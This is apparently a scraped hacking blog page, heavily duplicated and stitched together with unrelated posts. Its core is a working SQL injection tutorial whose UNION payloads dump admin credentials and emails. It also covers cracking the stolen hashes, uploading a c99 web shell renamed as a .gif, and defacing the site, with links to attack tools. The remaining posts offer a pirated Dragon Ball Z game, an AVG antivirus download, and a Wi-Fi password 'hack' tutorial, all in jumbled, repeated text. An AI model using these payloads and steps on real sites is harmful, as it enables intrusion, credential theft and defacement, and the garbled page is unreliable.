http://www.xyz.com/news.php?id=5 union all select 1,@@version,3/*
 
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .

What we need is convert() function
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


5). Getting table and column name

Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.xyz.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.

http://www.xyz.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists

http://www.xyz.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up 

i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice

For that we can use concat() function (it joins strings)
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )


http://www.xyz.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:p
assword on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)
It has user  password columns, so example would be

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1.
now to view the second table, we change limit 0,1 to limit 1,1
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.
for third table we put limit 2,1

i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
ie.

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... 


If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/


What we get here is user:p
ass:email from table users.

Example: admin:hash:whatever@gmail.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:


1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip


2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar


*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. 



To crack the password there are three ways:-

1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php


http://passcracking.com/index.php


3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar


Password = OwlsNest


2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.


1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/


2) You can use an admin finder software:


Code:
http://rapidshare.com/files/248020485/adminfinder.rar



After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar


Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to 
http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)


find the c99.php.gif and click it..


Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file. 

So if any one goes to that site they will see your page....

After Doing This click on Logout and You are Done..


 Enjoy;:))

Defacing a website simply means that we replace the index.html file of a site by our file. 
Now all the Users that open it will see our Page(i.e being uploaded by us).
First of all u should have the knowledge of :- 

1. SQL Injection(For analyzing website loops)
2. Admin Password

3. Shell Script (for getting Admin Controls)
Now, lets come on main topic,our first work is finding the target website.After it:-
1>> Test the vulnerability of the websites.  
 
for example,we have a site like this

http://www.xyz.com/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),and that would be
 
http://www.xyz.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar that means the Site is vulnerable to SQL injection.



2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.xyz.com/news.php?id=5
 order by 1/* <-- no error

http://www.xyz.com/news.php?id=5 order by 2/* <-- no error

http://www.xyz.com/news.php?id=5 order by 3/* <-- no error

http://www.xyz.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.



3). Check for UNION function

With union we can select more data in one sql statement.
So we have

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .


4). Check for MySQL version

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:-
 
http://www.xyz.com/news.php?id=5 union all select 1,@@version,3/*
 
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .

What we need is convert() function
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


5). Getting table and column name

Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.xyz.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.

http://www.xyz.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists

http://www.xyz.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up 

i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice

For that we can use concat() function (it joins strings)
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )


http://www.xyz.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:p
assword on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)
It has user  password columns, so example would be

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1.
now to view the second table, we change limit 0,1 to limit 1,1
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.
for third table we put limit 2,1

i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
ie.

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... 


If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/


What we get here is user:p
ass:email from table users.

Example: admin:hash:whatever@gmail.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:


1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip


2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar


*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. 



To crack the password there are three ways:-

1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php


http://passcracking.com/index.php


3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar


Password = OwlsNest


2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.


1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/


2) You can use an admin finder software:


Code:
http://rapidshare.com/files/248020485/adminfinder.rar



After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar


Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to 
http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)


find the c99.php.gif and click it..


Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file. 

So if any one goes to that site they will see your page....

After Doing This click on Logout and You are Done..


 Enjoy;:))

Defacing a website simply means that we replace the index.html file of a site by our file. 
Now all the Users that open it will see our Page(i.e being uploaded by us).
First of all u should have the knowledge of :- 

1. SQL Injection(For analyzing website loops)
2. Admin Password

3. Shell Script (for getting Admin Controls)
Now, lets come on main topic,our first work is finding the target website.After it:-
1>> Test the vulnerability of the websites.  
 
for example,we have a site like this

http://www.xyz.com/news.php?id=5

Now to test if is vulnerable we add to the end of url ' (quote),and that would be
 
http://www.xyz.com/news.php?id=5'

so if we get some error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

or something similar that means the Site is vulnerable to SQL injection.



2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.xyz.com/news.php?id=5
 order by 1/* <-- no error

http://www.xyz.com/news.php?id=5 order by 2/* <-- no error

http://www.xyz.com/news.php?id=5 order by 3/* <-- no error

http://www.xyz.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.



3). Check for UNION function

With union we can select more data in one sql statement.
So we have

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .


4). Check for MySQL version

http://www.xyz.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:-
 
http://www.xyz.com/news.php?id=5 union all select 1,@@version,3/*
 
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
I didn't see any paper covering this problem, so i must write it .

What we need is convert() function
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()
i.e.

http://www.xyz.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


5). Getting table and column name

Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be

http://www.xyz.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
We know that table admin exists...
Now to check column names.

http://www.xyz.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists

http://www.xyz.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up 

i.e md5 hash, mysql hash, sha1...
Now we must complete query to look nice

For that we can use concat() function (it joins strings)
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )


http://www.xyz.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:p
assword on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)
It has user  password columns, so example would be

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1.
now to view the second table, we change limit 0,1 to limit 1,1
i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.
for third table we put limit 2,1

i.e

http://www.xyz.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.
The second one (we change limit 0,1 to limit 1,1)
ie.

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... 


If you wanna display column names for specific table use this query. (where clause)
Let's say that we found table users.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
Let's say that we found colums user, pass and email.
Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.
i.e

http://www.xyz.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/


What we get here is user:p
ass:email from table users.

Example: admin:hash:whatever@gmail.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:


1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790...oitscanner.zip


2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907...elperV.2.7.rar


*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. 



To crack the password there are three ways:-

1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php


http://passcracking.com/index.php


3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796...CF_2.10_2b.rar


Password = OwlsNest


2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.


1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/


2) You can use an admin finder software:


Code:
http://rapidshare.com/files/248020485/adminfinder.rar



After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar


Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to 
http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)


find the c99.php.gif and click it..


Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file. 

So if any one goes to that site they will see your page....

After Doing This click on Logout and You are Done..


 Enjoy;:))

Download Game Dragon Ball Z: Bid For Power Full Version [ Mediafire Link ]

 - Setelah sebelumnya saya share Game Mortal Kombat 4 Full Version, Kali ini saya share lagi Game Dragon Ball Z: Bid For Power Full Version. Mungkin para Maniac Gamers sudah banyak yang tau tentang Game Dragon Ball Z: Bid For Power Full Version ini, Apalagi yang doyan main di Playstation pasti tidak asing lagi. Tapi Game Dragon Ball Z: Bid For Power Full Version kini hadir untuk bisa dimainkan di PC/Laptop Anda.

Screenshot

Minimum System Requirements
  1. 2 GHz Pentium 4 Processor / equivalent
  2. 512mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 128MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported
Recommended System Requirements
  1. 2.5 GHz Pentium 4 Processor / equivalent
  2. 1000mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 256MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported/ Windows 7
Download 5 Parts, 636 MB From Mediafire





 - Setelah sebelumnya saya share Game Mortal Kombat 4 Full Version, Kali ini saya share lagi Game Dragon Ball Z: Bid For Power Full Version. Mungkin para Maniac Gamers sudah banyak yang tau tentang Game Dragon Ball Z: Bid For Power Full Version ini, Apalagi yang doyan main di Playstation pasti tidak asing lagi. Tapi Game Dragon Ball Z: Bid For Power Full Version kini hadir untuk bisa dimainkan di PC/Laptop Anda.

Screenshot

Minimum System Requirements
  1. 2 GHz Pentium 4 Processor / equivalent
  2. 512mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 128MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported
Recommended System Requirements
  1. 2.5 GHz Pentium 4 Processor / equivalent
  2. 1000mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 256MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported/ Windows 7
Download 5 Parts, 636 MB From Mediafire





 - Setelah sebelumnya saya share Game Mortal Kombat 4 Full Version, Kali ini saya share lagi Game Dragon Ball Z: Bid For Power Full Version. Mungkin para Maniac Gamers sudah banyak yang tau tentang Game Dragon Ball Z: Bid For Power Full Version ini, Apalagi yang doyan main di Playstation pasti tidak asing lagi. Tapi Game Dragon Ball Z: Bid For Power Full Version kini hadir untuk bisa dimainkan di PC/Laptop Anda.

Screenshot

Minimum System Requirements
  1. 2 GHz Pentium 4 Processor / equivalent
  2. 512mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 128MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported
Recommended System Requirements
  1. 2.5 GHz Pentium 4 Processor / equivalent
  2. 1000mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 256MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported/ Windows 7
Download 5 Parts, 636 MB From Mediafire





 - Setelah sebelumnya saya share Game Mortal Kombat 4 Full Version, Kali ini saya share lagi Game Dragon Ball Z: Bid For Power Full Version. Mungkin para Maniac Gamers sudah banyak yang tau tentang Game Dragon Ball Z: Bid For Power Full Version ini, Apalagi yang doyan main di Playstation pasti tidak asing lagi. Tapi Game Dragon Ball Z: Bid For Power Full Version kini hadir untuk bisa dimainkan di PC/Laptop Anda.

Screenshot

Minimum System Requirements
  1. 2 GHz Pentium 4 Processor / equivalent
  2. 512mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 128MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported
Recommended System Requirements
  1. 2.5 GHz Pentium 4 Processor / equivalent
  2. 1000mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 256MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported/ Windows 7
Download 5 Parts, 636 MB From Mediafire





 - Setelah sebelumnya saya share Game Mortal Kombat 4 Full Version, Kali ini saya share lagi Game Dragon Ball Z: Bid For Power Full Version. Mungkin para Maniac Gamers sudah banyak yang tau tentang Game Dragon Ball Z: Bid For Power Full Version ini, Apalagi yang doyan main di Playstation pasti tidak asing lagi. Tapi Game Dragon Ball Z: Bid For Power Full Version kini hadir untuk bisa dimainkan di PC/Laptop Anda.

Screenshot

Minimum System Requirements
  1. 2 GHz Pentium 4 Processor / equivalent
  2. 512mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 128MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported
Recommended System Requirements
  1. 2.5 GHz Pentium 4 Processor / equivalent
  2. 1000mb Ram
  3. 2400 MB Hard drive required for the install,
  4. 256MB Graphics Accelerator ATI / NVIDIA Preferred
  5. Soundcard with fully OPENGL Support
  6. Network / Internet Connections for online / LAN play
  7. Windows XP Supported/Vista Supported/ Windows 7
Download 5 Parts, 636 MB From Mediafire





Free AVG Anti-Virus 2013 Released

Viruses are the main problem for all the computer users. Viruses attacks our PC in various ways. PC users are using many Anti-virus software to protect their PC from harmful viruses, but all the Anti-virus softwares cannot complete this task for 100%.

So here I'll give you one of the most popular Anti-virus software to protect your PC against viruses. Recently AVG has released their latest version of AVG Anti-virus 2013 for all the users. AVG is popular freeware Anti-virus to real time protect your PC against harmful viruses and malwares.





Free AVG Anti-Virus 2013 Released

The new version consist some major changes from it's previous version and fixed all the security bugs. AVG Anti-virus 2013 is fully supports with upcoming Microsoft's hyped product Windows 8 OS.


Free AVG Anti-Virus 2013 Released



Click Here to Download AVG Free Anti-Virus 2013 - 32 bit
Click Here to Download AVG Free Anti-Virus 2013 - 64 bit

Viruses are the main problem for all the computer users. Viruses attacks our PC in various ways. PC users are using many Anti-virus software to protect their PC from harmful viruses, but all the Anti-virus softwares cannot complete this task for 100%.

So here I'll give you one of the most popular Anti-virus software to protect your PC against viruses. Recently AVG has released their latest version of AVG Anti-virus 2013 for all the users. AVG is popular freeware Anti-virus to real time protect your PC against harmful viruses and malwares.





Free AVG Anti-Virus 2013 Released

The new version consist some major changes from it's previous version and fixed all the security bugs. AVG Anti-virus 2013 is fully supports with upcoming Microsoft's hyped product Windows 8 OS.


Free AVG Anti-Virus 2013 Released



Click Here to Download AVG Free Anti-Virus 2013 - 32 bit
Click Here to Download AVG Free Anti-Virus 2013 - 64 bit

Viruses are the main problem for all the computer users. Viruses attacks our PC in various ways. PC users are using many Anti-virus software to protect their PC from harmful viruses, but all the Anti-virus softwares cannot complete this task for 100%.

So here I'll give you one of the most popular Anti-virus software to protect your PC against viruses. Recently AVG has released their latest version of AVG Anti-virus 2013 for all the users. AVG is popular freeware Anti-virus to real time protect your PC against harmful viruses and malwares.





Free AVG Anti-Virus 2013 Released

The new version consist some major changes from it's previous version and fixed all the security bugs. AVG Anti-virus 2013 is fully supports with upcoming Microsoft's hyped product Windows 8 OS.


Free AVG Anti-Virus 2013 Released



Click Here to Download AVG Free Anti-Virus 2013 - 32 bit
Click Here to Download AVG Free Anti-Virus 2013 - 64 bit

Viruses are the main problem for all the computer users. Viruses attacks our PC in various ways. PC users are using many Anti-virus software to protect their PC from harmful viruses, but all the Anti-virus softwares cannot complete this task for 100%.

So here I'll give you one of the most popular Anti-virus software to protect your PC against viruses. Recently AVG has released their latest version of AVG Anti-virus 2013 for all the users. AVG is popular freeware Anti-virus to real time protect your PC against harmful viruses and malwares.





Free AVG Anti-Virus 2013 Released

The new version consist some major changes from it's previous version and fixed all the security bugs. AVG Anti-virus 2013 is fully supports with upcoming Microsoft's hyped product Windows 8 OS.


Free AVG Anti-Virus 2013 Released



Click Here to Download AVG Free Anti-Virus 2013 - 32 bit
Click Here to Download AVG Free Anti-Virus 2013 - 64 bit

Viruses are the main problem for all the computer users. Viruses attacks our PC in various ways. PC users are using many Anti-virus software to protect their PC from harmful viruses, but all the Anti-virus softwares cannot complete this task for 100%.

So here I'll give you one of the most popular Anti-virus software to protect your PC against viruses. Recently AVG has released their latest version of AVG Anti-virus 2013 for all the users. AVG is popular freeware Anti-virus to real time protect your PC against harmful viruses and malwares.





Free AVG Anti-Virus 2013 Released

The new version consist some major changes from it's previous version and fixed all the security bugs. AVG Anti-virus 2013 is fully supports with upcoming Microsoft's hyped product Windows 8 OS.


Free AVG Anti-Virus 2013 Released



Click Here to Download AVG Free Anti-Virus 2013 - 32 bit
Click Here to Download AVG Free Anti-Virus 2013 - 64 bit

Cara mudah dan cepat Hack Wifi Hotspot yang di Password

Anda mau ngenet tapi dana lagi pas-pasan? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Nah barangkali tutorial ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di tempat anda, sehingga anda bisa menikmati fasilitas wifi dengan cuma-cuma.

Cara hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu kita mencari jaringan wifi terdekat, sekaligus memberitahu apa password yang digunakan. Dengan cara ini anda tidak perlu lagi bingung berpindah-pindah tempat hanya untuk mencari internet gratis.

Apabila anda ingin menikmati fasilitas tool ini, sudah pasti anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud.

Berikut adalah tutorialnya yang perlu anda ketahui bahwa hack password wifi versi ini menggunakan software WirelessKeyView. Nah anda tidak perlu bingung karena penggunaan software ini sangat mudah dan tidak perlu diinstal terlebih dahulu. Jika anda sudah mengunduh tool tersebut, silahkan buka WirelessKeyView dan ia akan langsung mencari jaringan wifi secara otomatis yang terproteksi password maupun yang free.

Jika sudah siap, silahkan untuk mengcopy langsung password ke wifi yang terproteksi oleh password. Copy kalimat atau angka atau huruf atau simbol lain yang ada di bagian Key (Ascii).

Untuk mencobanya silahkan download tool dibawah ini:

Download

Anda mau ngenet tapi dana lagi pas-pasan? Mau internetan gratis tapi kesulitan mencari tahu password wifi ? Nah barangkali tutorial ini bisa memudahkan anda mendapatkan koneksi via wifi yang tersedia di tempat anda, sehingga anda bisa menikmati fasilitas wifi dengan cuma-cuma.

Cara hack Password Wifi ini berasal dari sebuah tool sederhana yang akan membantu kita mencari jaringan wifi terdekat, sekaligus memberitahu apa password yang digunakan. Dengan cara ini anda tidak perlu lagi bingung berpindah-pindah tempat hanya untuk mencari internet gratis.

Apabila anda ingin menikmati fasilitas tool ini, sudah pasti anda diwajibkan untuk melakukan download guna mendapatkan tool hack password wifi yang dimaksud.

